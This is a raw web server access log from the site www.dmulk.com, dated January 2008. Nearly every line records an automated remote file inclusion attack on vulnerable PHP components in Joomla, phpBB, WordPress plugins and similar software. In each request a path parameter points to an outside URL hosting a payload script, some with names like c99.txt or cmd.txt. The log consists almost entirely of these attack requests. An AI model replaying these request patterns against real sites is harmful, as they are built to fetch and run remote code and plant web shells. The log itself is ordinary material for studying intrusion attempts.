66.98.150.12 - - [31/Jan/2008:05:06:41 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://turnkeywebsites247.com/catimages/tst.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.94.24.226 - - [31/Jan/2008:05:06:41 -0800] "GET /?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.24.226 - - [31/Jan/2008:05:06:49 -0800] "GET /logs/?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 200 32541 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.24.226 - - [31/Jan/2008:05:06:58 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://www.nordicracingteam.com/cms_svl/media/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:05:07:19 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:05:07:19 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:05:09:12 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.72.184.250 - - [31/Jan/2008:05:09:26 -0800] "GET /logs//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.72.184.250 - - [31/Jan/2008:05:09:26 -0800] "GET //modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:05:10:59 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.128.45 - - [31/Jan/2008:05:12:27 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.82.187.238 - - [31/Jan/2008:05:13:45 -0800] "GET /logs/access_071230.log/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.82.187.238 - - [31/Jan/2008:05:13:46 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:05:14:25 -0800] "GET /logs/access_080106.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.bakhshian.ir/language/lang/f.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:05:14:25 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.bakhshian.ir/language/lang/f.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:05:14:25 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.bakhshian.ir/language/lang/f.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.91.34 - - [31/Jan/2008:05:14:36 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:16:21 -0800] "GET /logs/access_080117.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:16:21 -0800] "GET /logs/access_080117.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:16:21 -0800] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:16:21 -0800] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:16:22 -0800] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:16:22 -0800] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:17:10 -0800] "GET /logs/access_071231.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.72.71 - - [31/Jan/2008:05:17:10 -0800] "GET /logs/access_071231.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://findonline.bravehost.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.184.250 - - [31/Jan/2008:05:17:32 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
212.72.184.250 - - [31/Jan/2008:05:17:32 -0800] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.117.128.45 - - [31/Jan/2008:05:18:16 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [31/Jan/2008:05:18:17 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [31/Jan/2008:05:18:17 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.128.45 - - [31/Jan/2008:05:18:39 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.184.3.228 - - [31/Jan/2008:05:19:33 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:05:20:18 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:05:20:18 -0800] "GET //?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:05:20:19 -0800] "GET /logs//?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 200 33218 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:05:21:13 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:05:21:13 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.74.238 - - [31/Jan/2008:05:22:18 -0800] "GET /logs/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.littleknownsecrets.com/images/gallery2.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.194.74.238 - - [31/Jan/2008:05:22:18 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.littleknownsecrets.com/images/gallery2.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.38.34.10 - - [31/Jan/2008:05:25:42 -0800] "GET //ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.38.34.10 - - [31/Jan/2008:05:25:42 -0800] "GET /logs//ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
203.88.114.169 - - [31/Jan/2008:05:25:49 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.120.242 - - [31/Jan/2008:05:26:02 -0800] "GET /logs//multithumb?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
87.118.120.242 - - [31/Jan/2008:05:26:03 -0800] "GET //multithumb?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:05:26:33 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:05:26:33 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:05:26:33 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
149.31.2.12 - - [31/Jan/2008:05:26:38 -0800] "GET //ask_password.php?dir=http://www.texasasla.org/calendar/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
149.31.2.12 - - [31/Jan/2008:05:26:38 -0800] "GET /logs//ask_password.php?dir=http://www.texasasla.org/calendar/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:05:26:55 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.54.181.4 - - [31/Jan/2008:05:27:34 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sunset.alfaspace.net//temp/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.157.58.25 - - [31/Jan/2008:05:27:34 -0800] "GET //ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.157.58.25 - - [31/Jan/2008:05:27:35 -0800] "GET /logs//ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
85.214.29.175 - - [31/Jan/2008:05:27:43 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.megujuloorokseg.hu/config/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.29.175 - - [31/Jan/2008:05:27:43 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.megujuloorokseg.hu/config/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.29.175 - - [31/Jan/2008:05:27:43 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.megujuloorokseg.hu/config/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.113.244.14 - - [31/Jan/2008:05:29:00 -0800] "GET //ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
38.113.244.14 - - [31/Jan/2008:05:29:00 -0800] "GET /logs//ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
69.57.148.17 - - [31/Jan/2008:05:30:39 -0800] "GET /logs//ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.57.148.17 - - [31/Jan/2008:05:30:39 -0800] "GET //ask_password.php?dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:05:31:43 -0800] "GET ///components/com_articles.php?absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:05:31:43 -0800] "GET /logs///components/com_articles.php?absolute_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.32.209.240 - - [31/Jan/2008:05:32:10 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.240 - - [31/Jan/2008:05:32:10 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.240 - - [31/Jan/2008:05:32:10 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [31/Jan/2008:05:32:17 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [31/Jan/2008:05:32:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [31/Jan/2008:05:32:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.240 - - [31/Jan/2008:05:32:26 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.14.110.31 - - [31/Jan/2008:05:33:01 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.232.10.71 - - [31/Jan/2008:05:34:10 -0800] "GET /logs/access_071226.log HTTP/1.1" 200 327680 "http://www.google.com.tr/search?q=com_slideshow+&hl=tr&start=60&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
88.232.10.71 - - [31/Jan/2008:05:34:24 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
88.232.10.71 - - [31/Jan/2008:05:34:28 -0800] "GET /com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://darbelaz.ch/c99.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:05:34:41 -0800] "GET /logs/access_080104.log/send_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:05:34:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.106.224.247 - - [31/Jan/2008:05:34:53 -0800] "GET /com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://darbelaz.ch/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
67.228.111.156 - - [31/Jan/2008:05:37:46 -0800] "GET /errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
67.228.111.156 - - [31/Jan/2008:05:37:46 -0800] "GET /logs/errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:05:39:16 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:05:39:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.74.238 - - [31/Jan/2008:05:39:23 -0800] "GET /index.php?option=com_users&Itemid=&mosConfig_absolute_path=http://www.littleknownsecrets.com/images/gallery2.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
82.194.74.238 - - [31/Jan/2008:05:39:23 -0800] "GET /logs/index.php?option=com_users&Itemid=&mosConfig_absolute_path=http://www.littleknownsecrets.com/images/gallery2.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:39:33 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:39:34 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:39:34 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:39:54 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:39:55 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:39:55 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:05:40:43 -0800] "GET /logs/access.log///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:05:40:45 -0800] "GET ///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:05:40:45 -0800] "GET /logs///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:05:40:50 -0800] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.202.20 - - [31/Jan/2008:05:40:50 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:05:41:25 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [31/Jan/2008:05:41:26 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.167.33 - - [31/Jan/2008:05:44:20 -0800] "GET //phpmyadminhttp://www.groovecalendar.com//tools/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
81.169.167.33 - - [31/Jan/2008:05:44:23 -0800] "GET /tools//phpmyadminhttp://www.groovecalendar.com//tools/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:05:45:47 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [31/Jan/2008:05:46:17 -0800] "GET /logs/access_080103.log///////////////includes/functions_admin.php?phpbb_root_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.93 - - [31/Jan/2008:05:48:49 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [31/Jan/2008:05:48:49 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.19.18.66 - - [31/Jan/2008:05:49:19 -0800] "GET /logs/access_071230.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.178.146 - - [31/Jan/2008:05:51:55 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.29.175 - - [31/Jan/2008:05:52:55 -0800] "GET //com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.megujuloorokseg.hu/config/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.29.175 - - [31/Jan/2008:05:52:55 -0800] "GET /logs//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.megujuloorokseg.hu/config/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.209.240 - - [31/Jan/2008:05:53:01 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:05:53:10 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.231.114 - - [31/Jan/2008:05:53:44 -0800] "GET /logs/access_080103.log//components/com_articles.php?absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [31/Jan/2008:05:53:44 -0800] "GET //components/com_articles.php?absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
